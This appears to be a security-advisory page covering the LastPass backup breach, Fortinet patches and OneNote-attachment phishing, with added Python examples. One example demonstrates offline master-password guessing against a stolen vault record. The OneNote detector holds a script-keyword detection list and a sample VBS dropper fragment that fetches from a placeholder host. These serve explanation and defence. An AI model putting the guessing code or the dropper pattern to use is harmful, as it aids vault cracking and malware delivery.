Categories
Cybersecurity Advisories

LastPass Reveals Additional Details of Their Second Hack

LastPass has shared additional details on the second security incident, disclosed in December, in which an unnamed threat actor combined data stolen during the August 2022 breach with information from a separate data breach and a vulnerability in a third-party media software package to mount a coordinated attack. The threat actor targeted a senior DevOps engineer, compromising the engineer's personal home computer by exploiting the vulnerable third-party software, installing a keylogger, bypassing existing controls, and ultimately gaining unauthorized access to LastPass's cloud backups.

The keylogger captured the employee's master password as it was typed, after the employee had already authenticated with MFA, giving the threat actor access to the DevOps engineer's LastPass corporate vault. The threat actor then exported the native corporate vault entries and the contents of shared folders, which held encrypted secure notes containing the access and decryption keys needed to reach the AWS S3 LastPass production backups, other cloud-based storage resources, and some related critical database backups.

In the aftermath of the incident, LastPass says it upgraded its security posture by rotating critical and high-privilege credentials, reissuing the certificates obtained by the threat actor, and applying additional S3 hardening measures that include logging and alerting. LastPass has released a new security advisory and a PDF detailing further information about the breach and the stolen data. LastPass's parent company, GoTo, announced that it will notify individuals whose data was affected and provide "actionable steps" to better secure their accounts.

Summary of data accessed

  • DevOps Secrets – restricted secrets that were used to gain access to our cloud-based backup storage.
  • Cloud-based backup storage – contained configuration data, API secrets, third-party integration secrets, customer metadata, and backups of all customer vault data. All sensitive customer vault data, other than URLs, file paths to installed LastPass Windows or macOS software, and certain use cases involving email addresses, were encrypted using our zero-knowledge model and can only be decrypted with a unique encryption key derived from each user's master password. As a reminder, end-user master passwords are never known to LastPass and are not stored or maintained by LastPass; therefore, they were not included in the exfiltrated data.
  • Backup of LastPass MFA/Federation Database – contained copies of LastPass Authenticator seeds, telephone numbers used for the MFA backup option (if enabled), as well as a split-knowledge component (the K2 "key") used for LastPass federation (if enabled). This database was encrypted, but the separately stored decryption key was included in the secrets stolen by the threat actor during the second incident.
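Why the stolen backups still matter even though the vaults were encrypted: the following Python, added here as an illustration and not LastPass code, models an attacker who holds a copy of an encrypted vault record and tries master-password guesses offline. The key derivation (PBKDF2-SHA256 salted with the account email), the iteration counts, the HMAC-based stand-in for the real cipher, the record contents and the wordlist are all assumptions of this example, not statements about LastPass internals. The point it shows is that nothing in exfiltrated data rate-limits guessing, so the master password's strength and the account's KDF iteration count are the only remaining defences.

```python
"""Offline guessing against an exfiltrated, master-password-encrypted vault record.
Added example (not LastPass code); standard library only."""
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional, Tuple

# Illustrative KDF work factors. LastPass's documented default was 100,100 rounds
# of PBKDF2-SHA256, while accounts created earlier could still carry far lower
# settings. Both values here are assumptions of this example.
LEGACY_ITERATIONS = 5_000
DEFAULT_ITERATIONS = 100_100


def derive_vault_key(master_password: str, email: str, iterations: int) -> bytes:
    """PBKDF2-SHA256 keyed by the master password and salted with the account
    email (an assumption of this example, not a description of LastPass)."""
    return hashlib.pbkdf2_hmac("sha256", master_password.encode("utf-8"),
                               email.lower().encode("utf-8"), iterations, 32)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Stand-in stream cipher (HMAC-SHA256 in counter mode) so the example runs
    # without a third-party AES library. It is a placeholder, not a recommendation.
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt_record(key: bytes, record: dict) -> dict:
    plaintext = json.dumps(record, separators=(",", ":")).encode("utf-8")
    nonce = secrets.token_bytes(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return {"nonce": nonce.hex(), "ct": ct.hex()}


def decrypt_record(key: bytes, blob: dict) -> Optional[dict]:
    """Return the record for the right key, None for a wrong one.
    A wrong key yields random bytes, which fail UTF-8/JSON decoding."""
    nonce, ct = bytes.fromhex(blob["nonce"]), bytes.fromhex(blob["ct"])
    pt = bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))
    try:
        obj = json.loads(pt.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return None
    return obj if isinstance(obj, dict) else None


def build_stolen_backup(master_password: str, email: str, iterations: int) -> dict:
    """What one vault record looks like to the attacker: the salt (email), the
    KDF iteration count and ciphertext, but never the master password or key."""
    key = derive_vault_key(master_password, email, iterations)
    record = {"username": "admin", "password": "hunter2", "note": "cloud backup key"}  # constructed
    return {"email": email, "iterations": iterations, "record": encrypt_record(key, record)}


def offline_guess(backup: dict, candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Try each candidate master password against the stolen record.
    Returns (recovered password or None, number of PBKDF2 derivations spent)."""
    work = 0
    for cand in candidates:
        work += 1
        key = derive_vault_key(cand, backup["email"], backup["iterations"])
        if decrypt_record(key, backup["record"]) is not None:
            return cand, work
    return None, work


# Constructed wordlist standing in for the leaked-password lists an attacker would use.
WORDLIST = ["123456", "password", "Summer2022!", "letmein", "qwerty123", "Welcome1"]

if __name__ == "__main__":
    weak = build_stolen_backup("Summer2022!", "alice@example.com", LEGACY_ITERATIONS)
    strong = build_stolen_backup("correct-horse-battery-staple-9x", "alice@example.com", DEFAULT_ITERATIONS)
    print("weak master password, legacy KDF:", offline_guess(weak, WORDLIST))
    print("strong master password, default KDF:", offline_guess(strong, WORDLIST))
```

Each guess costs the defender-chosen number of PBKDF2 rounds, so raising the iteration count multiplies the attacker's cost by the same factor, but only a master password outside any wordlist makes the search infeasible; that is the rationale behind the recommendation to change master passwords and the secrets stored behind them.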

Additional details can be found here.

Recommendations

LastPass users are strongly urged to change their master passwords and all the passwords stored in their vaults to mitigate potential risks, if not done already.

Mitigations

LastPass has provided two security bulletins to assist customers in their own incident response efforts.

  • Security Bulletin: Recommended Actions for LastPass Free, Premium, and Families Customers. This bulletin guides our Free, Premium, and Families customers through a review of important LastPass settings designed to help secure their accounts by confirming best practices are being followed.
  • Security Bulletin: Recommended Actions for LastPass Business Administrators. This bulletin guides administrators for our Business and Teams customers through a risk assessment of LastPass account configurations and third-party integrations. It also includes information that is relevant to both non-federated and federated customers.

Resources & Related Articles


Fortinet Patches 40 Flaws Affecting FortiWeb, FortiOS, FortiNAC, and FortiProxy

Fortinet released security advisories for 40 vulnerabilities to inform customers of available security patches. Affected Fortinet products include FortiWeb, FortiOS, FortiNAC, and FortiProxy, among others. Two of the vulnerabilities are rated Critical, 15 are rated High, 22 are rated Medium, and one is rated Low in severity. 

CVE-2022-39952 (CVSS score: 9.8) is a critical bug in FortiNAC that can lead to arbitrary code execution: an unauthenticated attacker can write arbitrary files on the system and achieve remote code execution with the highest privileges. Organizations running FortiNAC 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, or any version on the 8.8, 8.7, 8.6, 8.5, and 8.3 branches are urged to prioritize applying the available security updates (FG-IR-22-300). Researchers from Horizon3 have also released proof-of-concept exploit code on the company's GitHub repository, so FortiNAC administrators should upgrade immediately to a version that is not affected by CVE-2022-39952.

The second critical flaw, CVE-2021-42756 (CVSS score: 9.3), was discovered more than a year ago and is a set of stack-based buffer overflows in FortiWeb's proxy daemon that could allow an unauthenticated remote attacker to achieve arbitrary code execution via specially crafted HTTP requests. It is fixed (FG-IR-21-186) in FortiWeb 7.0.0 or above, 6.3.17 or above, 6.2.7 or above, 6.1.3 or above, and 6.0.8 or above.
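To turn the version ranges quoted in the two paragraphs above into a repeatable check against an inventory, the following Python is added here as an example (it is not Fortinet tooling). The FortiNAC ranges are taken from the text, with the first fixed release on each branch inferred as the release immediately after the affected range (9.4.1, 9.2.6, 9.1.8); the FortiWeb ranges use the "or above" fixed versions stated above. Any version on a branch the advisory text does not mention is reported as "verify" rather than guessed, because the PSIRT advisory, not this snippet, is the authority. The host inventory is constructed.

```python
"""Match Fortinet product versions against advisory ranges. Added example; stdlib only."""
import re
from dataclasses import dataclass
from typing import Dict, Optional, Sequence, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'9.2.5', 'v9.2.5,build0467' or 'FortiWeb 6.3.16 (GA)' -> (9, 2, 5) / (6, 3, 16)."""
    m = re.search(r"v?(\d+(?:\.\d+)+)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


@dataclass(frozen=True)
class Branch:
    prefix: Version                    # release branch, e.g. (9, 2)
    first_affected: Optional[Version]  # None: every release on the branch is affected
    first_fixed: Optional[Version]     # None: no fixed release exists on this branch


def is_affected(version: str, branches: Sequence[Branch]) -> Optional[bool]:
    """True/False when the branch is covered by the advisory text, None when it is not."""
    v = parse_version(version)
    for b in branches:
        if v[: len(b.prefix)] != b.prefix:
            continue
        if b.first_affected is not None and v < b.first_affected:
            return False
        if b.first_fixed is not None and v >= b.first_fixed:
            return False
        return True
    return None


# FG-IR-22-300 / CVE-2022-39952 (FortiNAC), ranges as stated on this page.
FORTINAC_CVE_2022_39952 = [
    Branch((9, 4), (9, 4, 0), (9, 4, 1)),   # 9.4.0 only; 9.4.1 inferred as first fixed
    Branch((9, 2), (9, 2, 0), (9, 2, 6)),   # 9.2.0 through 9.2.5
    Branch((9, 1), (9, 1, 0), (9, 1, 8)),   # 9.1.0 through 9.1.7
    Branch((8, 8), None, None), Branch((8, 7), None, None), Branch((8, 6), None, None),
    Branch((8, 5), None, None), Branch((8, 3), None, None),  # whole branches, no fix
]

# FG-IR-21-186 / CVE-2021-42756 (FortiWeb): fixed in the listed versions "or above".
FORTIWEB_CVE_2021_42756 = [
    Branch((7, 0), None, (7, 0, 0)),
    Branch((6, 3), None, (6, 3, 17)),
    Branch((6, 2), None, (6, 2, 7)),
    Branch((6, 1), None, (6, 1, 3)),
    Branch((6, 0), None, (6, 0, 8)),
]

ADVISORIES: Dict[str, Tuple[str, Sequence[Branch]]] = {
    "FortiNAC": ("CVE-2022-39952", FORTINAC_CVE_2022_39952),
    "FortiWeb": ("CVE-2021-42756", FORTIWEB_CVE_2021_42756),
}


def triage(inventory: Dict[str, Tuple[str, str]]) -> Dict[str, str]:
    """hostname -> 'patch' (affected), 'ok' (fixed), or 'verify' (branch not in the text)."""
    result = {}
    for host, (product, version) in inventory.items():
        _cve, branches = ADVISORIES[product]
        state = is_affected(version, branches)
        result[host] = "verify" if state is None else ("patch" if state else "ok")
    return result


# Constructed inventory for the demonstration.
INVENTORY = {
    "nac-01": ("FortiNAC", "v9.2.3,build0467"),
    "nac-02": ("FortiNAC", "9.4.1"),
    "nac-03": ("FortiNAC", "7.2.0"),
    "waf-01": ("FortiWeb", "6.2.6"),
    "waf-02": ("FortiWeb", "7.0.3"),
}

if __name__ == "__main__":
    for host, action in triage(INVENTORY).items():
        print(f"{host}: {action}")
```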

Affected Software 

See: PSIRT Advisories. 

Recommendation 

Organizations are recommended to view the PSIRT Advisories and apply available security updates for affected products. 

Resources & Related Articles 


Hackers Use Microsoft OneNote Attachments to Spread Malware

Description 

Malicious actors have begun using Microsoft OneNote attachments, a file format not previously common in phishing, to deliver malware. Because OneNote lets users embed attachments in a notebook, threat actors abuse this feature by embedding malicious VBS files that run when double-clicked and download malware from a remote site. An embedded attachment appears in OneNote as a file icon, so the threat actors place a large "Double click to view file" bar over the embedded VBS attachments to hide them. Moving the bar aside reveals several copies of the malicious attachment beneath it, arranged so that wherever the user double-clicks on the bar, the second click lands on an attachment and launches the malware. Fortunately, OneNote displays a warning before running an embedded attachment. If the victim ignores the warning and clicks OK, the VBS script runs, downloads the malware, and installs it, giving the threat actor remote access to the device to steal files and saved browser passwords, take screenshots, and in some cases even record video with the webcam.
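The technique above leaves two things inside the .one file itself: the embedded attachment bodies and the lure text drawn over them. The following Python, added here as an example and not SecurIT360's or Microsoft's code, walks a .one file for embedded-file records using the MS-ONE FileDataStoreObject markers (header GUID {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}, footer GUID {71FBA722-0F79-4A0B-BB13-899256426B24}, with the eight-byte length field between them), classifies each payload by magic bytes and script keywords, and looks for the UTF-16 lure phrases. The classification keyword list, the lure phrase list and the sample file bytes are constructed for this example; a real notebook carries much more structure than the minimal sample built here.

```python
"""Scan a OneNote .one file for embedded attachments and lure text.
Added example (not SecurIT360 or Microsoft code); standard library only."""
import re
import struct
from typing import Dict, List

# MS-ONE GUID markers as they appear on disk (little-endian field order).
ONE_FILE_HEADER = bytes.fromhex("e4525c7b8cd8a74daeb15378d02996d3")  # {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}
FDSO_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")      # {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}
FDSO_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")      # {71FBA722-0F79-4A0B-BB13-899256426B24}
# FileDataStoreObject: guidHeader(16) cbLength(8) unused(4) reserved(8) FileData(cbLength) guidFooter(16)
FDSO_DATA_OFFSET = 16 + 8 + 4 + 8

# Keyword heuristics for script droppers (constructed list for this example).
SCRIPT_MARKERS = re.compile(rb"createobject|wscript\.shell|adodb\.stream|msxml2\.xmlhttp|powershell|cmd(?:\.exe)?\s*/c")
LURE_PHRASES = ("double click to view", "click to view document")
EXECUTABLE_KINDS = {"pe", "lnk", "script", "hta/html"}


def classify(payload: bytes) -> str:
    """Coarse type of an embedded payload from magic bytes, then script keywords."""
    if payload.startswith(b"MZ"):
        return "pe"
    if payload.startswith(b"\x4c\x00\x00\x00\x01\x14\x02\x00"):  # LNK HeaderSize + LinkCLSID start
        return "lnk"
    if payload.startswith(b"%PDF"):
        return "pdf"
    if payload.startswith(b"\x89PNG"):
        return "png"
    if payload.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    head = payload[:4096].lower()
    if b"<hta:application" in head or b"<script" in head:
        return "hta/html"
    if SCRIPT_MARKERS.search(head):
        return "script"
    return "unknown"


def extract_attachments(data: bytes) -> List[Dict]:
    """Locate every FileDataStoreObject and return its offset, size, type and payload."""
    found, pos = [], 0
    while True:
        idx = data.find(FDSO_HEADER, pos)
        if idx < 0 or idx + FDSO_DATA_OFFSET > len(data):
            break
        (length,) = struct.unpack_from("<Q", data, idx + 16)
        start = idx + FDSO_DATA_OFFSET
        payload = data[start:start + length]
        found.append({
            "offset": idx,
            "size": length,
            "truncated": len(payload) != length,  # bogus length or cut-off file
            "footer_ok": data[start + length:start + length + 16] == FDSO_FOOTER,
            "kind": classify(payload),
            "payload": payload,
        })
        pos = idx + 16  # advance past the header only, so a bad length cannot skip records
    return found


def find_lures(data: bytes) -> List[str]:
    """OneNote stores page text as UTF-16LE; lowercase the ASCII bytes and search."""
    haystack = data.lower()
    return [p for p in LURE_PHRASES if p.encode("utf-16-le") in haystack]


def scan(data: bytes) -> Dict:
    attachments = extract_attachments(data)
    risky = [a for a in attachments if a["kind"] in EXECUTABLE_KINDS]
    return {
        "is_onenote": data.startswith(ONE_FILE_HEADER),
        "attachments": attachments,
        "lures": find_lures(data),
        "verdict": "suspicious" if risky else "clean",
    }


def make_fdso(payload: bytes) -> bytes:
    """Build one FileDataStoreObject record (used only to construct the sample)."""
    return FDSO_HEADER + struct.pack("<Q", len(payload)) + b"\0" * 4 + b"\0" * 8 + payload + FDSO_FOOTER


# Constructed sample: a minimal .one-like blob with a VBS dropper and a PNG embedded.
VBS_PAYLOAD = (b'Set o = CreateObject("MSXML2.XMLHTTP")\r\n'
               b'o.Open "GET", "http://example.invalid/x", False\r\n'
               b'Set s = CreateObject("WScript.Shell")\r\n')
SAMPLE_ONE = (ONE_FILE_HEADER + b"\0" * 64
              + "Double Click to View File".encode("utf-16-le") + b"\0" * 32
              + make_fdso(VBS_PAYLOAD) + b"\0" * 16
              + make_fdso(b"\x89PNG\r\n\x1a\n" + b"\0" * 40))

if __name__ == "__main__":
    report = scan(SAMPLE_ONE)
    for a in report["attachments"]:
        print(f"offset={a['offset']} size={a['size']} kind={a['kind']} footer_ok={a['footer_ok']}")
    print("lures:", report["lures"], "verdict:", report["verdict"])
```

A mail-gateway or EDR rule built on this only needs the verdict and the attachment kinds; the extracted payloads can be handed straight to the usual script and PE analysis, and the lure-text hit is a useful secondary signal because benign notebooks rarely contain that phrase.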

Fake DHL Email with OneNote Attachment 

Malicious OneNote Email Attachment

SecurIT360 SOC Managed Services 

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity:  

MDR Services 

  • We have added indicators related to known malicious threat actors into our blocklists in our MDR solution, FortiSIEM.  
  • Indicators are provided in the Indicators of Compromise section below if you would like to proactively block them in your firewall.  

EDR Services 

  • In addition to ongoing vendor IoC updates, we have implemented known IoC information to help with detection.   

As always, if we detect activity related to this campaign, we will alert you where applicable.  

Recommendations 

  • The best way to protect against malicious attachments is to simply not open files from people you do not know. If a file is mistakenly opened, do not disregard the warnings displayed by the operating system or application.  
  • If you see a warning that opening an attachment or link could harm your computer or files, simply do not press OK and close the application.  
  • If you feel it may be a legitimate email, share it with a security or Windows admin to help you verify if the file is safe.  
  • Consider blocking “.one” attachments. See: 
  • OneNote users are recommended to enable multi-factor authentication, use antivirus protection, and follow the best security practices for preventing phishing attacks.    

Detections 

SOC Prime has released rules to detect cyber attacks abusing OneNote attachments. Click here to access the full list of relevant detection content.  

MITRE Summary 

  • TA0002 – Execution
  • T1047 – Windows Management Instrumentation
  • TA0005 – Defense Evasion
  • T1027 – Obfuscated Files or Information
  • T1036 – Masquerading
  • T1070.006 – Timestomp
  • T1497 – Virtualization/Sandbox Evasion
  • T1562.001 – Disable or Modify Tools
  • TA0006 – Credential Access
  • T1003 – OS Credential Dumping
  • TA0007 – Discovery
  • T1057 – Process Discovery
  • T1082 – System Information Discovery
  • T1012 – Query Registry
  • T1016 – System Network Configuration Discovery
  • T1083 – File and Directory Discovery
  • TA0009 – Collection
  • T1005 – Data from Local System
  • TA0011 – Command and Control
  • T1071 – Application Layer Protocol

Indicators of Compromise (IoCs) 

Resources & Related Articles